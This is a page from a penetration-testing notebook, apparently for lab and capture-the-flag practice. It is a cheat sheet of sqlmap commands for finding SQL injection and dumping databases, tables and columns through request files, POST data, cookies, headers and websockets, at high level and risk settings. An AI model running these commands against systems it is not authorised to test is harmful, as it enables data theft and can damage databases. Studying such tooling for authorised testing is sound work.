🔮
P4n1cBook
  • 🏴‍☠️Welcome!
    • 🔮P4n1cBook
    • 📚Bookmarks
    • 🚨Licence and Disclaimer
  • Fundamentals
    • Starter Kit
      • Linux
      • PowerShell
      • Git
      • 💾Regex
      • Network Analysis
        • curl
        • tcpdump
        • Nmap
        • 🦈Wireshark
      • Metasploit
    • 🌐Network Protocols
      • ICMP
      • SSH
      • Telnet
      • DNS
      • FTP
      • HTTP/HTTPS
      • SMB
      • SNMP
      • SMTP
      • NFS
      • IPP
      • WinRM
      • LLMNR
      • JDWP
    • Code
      • Python Essentials
      • C & C++
    • Web APIs
      • GraphQL
    • Shells/TTYs
    • Dorks
    • Cryptography
    • Reverse Engineering
      • GDB
      • Binaries
  • Web Exploitation
    • Web Enumeration
      • User Endpoints
      • Web Fuzzing
        • ffuf
        • feroxbuster
        • Gobuster
        • GoWitness
      • Web Servers
        • Apache
        • Nginx
        • Werkzeug
      • Databases
        • MySQL
        • NoSQL
          • MongoDB
          • Redis
      • Web Services/Frameworks
        • Wordpress
        • Laravel
        • Express
        • Magento
        • AIOHTTP
        • HashiCorp Vault
        • Tiny File Manager
        • Joomla
        • CMS Made Simple
        • 🌵Cacti
        • Tomcat
        • Zabbix
        • OpenNetAdmin
        • ImageMagick
    • Vulnerabilities
      • Arbitrary File Read
      • Session Hijacking
      • SSRF
      • Eval Injection
      • Template Manipulation
      • Path Traversal
      • Prototype Pollution
      • XXE
      • Deserialization
      • Log Poisoning
      • Arbitrary Command Execution
      • SQLi
        • SQLmap
      • SSI
      • SSTI
      • LFI
      • XSS
    • Java-based web application
      • Struts
      • .WAR
      • pd4ml.jar
  • Cloud Exploitation
    • Kubernetes
    • AWS
  • Post Exploitation
    • File Transfer
      • Exfiltration
    • Credential Dumping
      • Thunderbird
    • Lateral Movement
    • Persistence
    • Linux Privilege Escalation
      • Static Binaries
      • Enumeration
      • Hijacks
      • Command Injection
      • Jailbreaks
      • Binary Exploitation - Linux
      • Kernel Exploits
      • Buffer Overflow - Linux
      • Docker
      • Abusing Wildcards
  • Wireless Exploitation
    • NFC
Powered by GitBook
On this page
Edit on GitHub
  1. Web Exploitation
  2. Vulnerabilities
  3. SQLi

SQLmap

Operators

--batch -> Non interactive mode.

--dbms -> Type of db being use (Ex. mysql)

--threads -> Goes from 1 to 10.

Data

  • To retrieve everything:

--all --dump

--dbs -> List all the databases.

  • To look at the tables of a specific database:

-D database --tables

  • Repeat the same process for columns:

-D database -T table --columns

  • For dumping the data:

-D database -T table --dump

  • Or dump just one column:

-D database -T table -C column --dump

--level

This option sets the level of tests, with values ranging from 1 to 5 (the default is level 1).

  • Level 1: Basic tests, only the most common and least intrusive SQL injection tests are performed.

  • Level 2-4: These levels increase the range and types of tests performed, with more advanced and varied testing.

  • Level 5: Perform the most comprehensive set of tests, including advanced and highly invasive tests. It increases the risk of being detected or causing issues on the target system.

--risk

This option sets the risk level of tests, with values ranging from 1 to 3 (the default is 1).

  • Risk 1: Basic, low-risk tests that are less likely to cause harm or be detected.

  • Risk 2: Performs potentially more intrusive or advanced techniques.

  • Risk 3: Attempt high-risk tests that could be more aggressive, such as testing for blind injections, time-based techniques, or dropping and modifying tables.

HTTP

  • When working with HTTP request is good practice to directly save the request in to a file and use the -r option

sqlmap -r request.txt --level 5 --risk 3 --dump-all --batch

  • Use --force-ssl when working with HTTPS.

Initiates the injection test
sqlmap -r login.request --force-ssl --batch

  • When working with POST requests you need to use the option --data:

sqlmap -u "http://example.com" --data "username=*&password=*"

  • For cookies:

sqlmap  -u "http://example.com" --cookie "cookie=INJECTION"

Headers

sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

Methods

PUT
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

Websockets

  • Install the python websocket-client module.

  • Indicate the port and data:

sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3
PreviousSQLiNextSSI

Last updated 6 months ago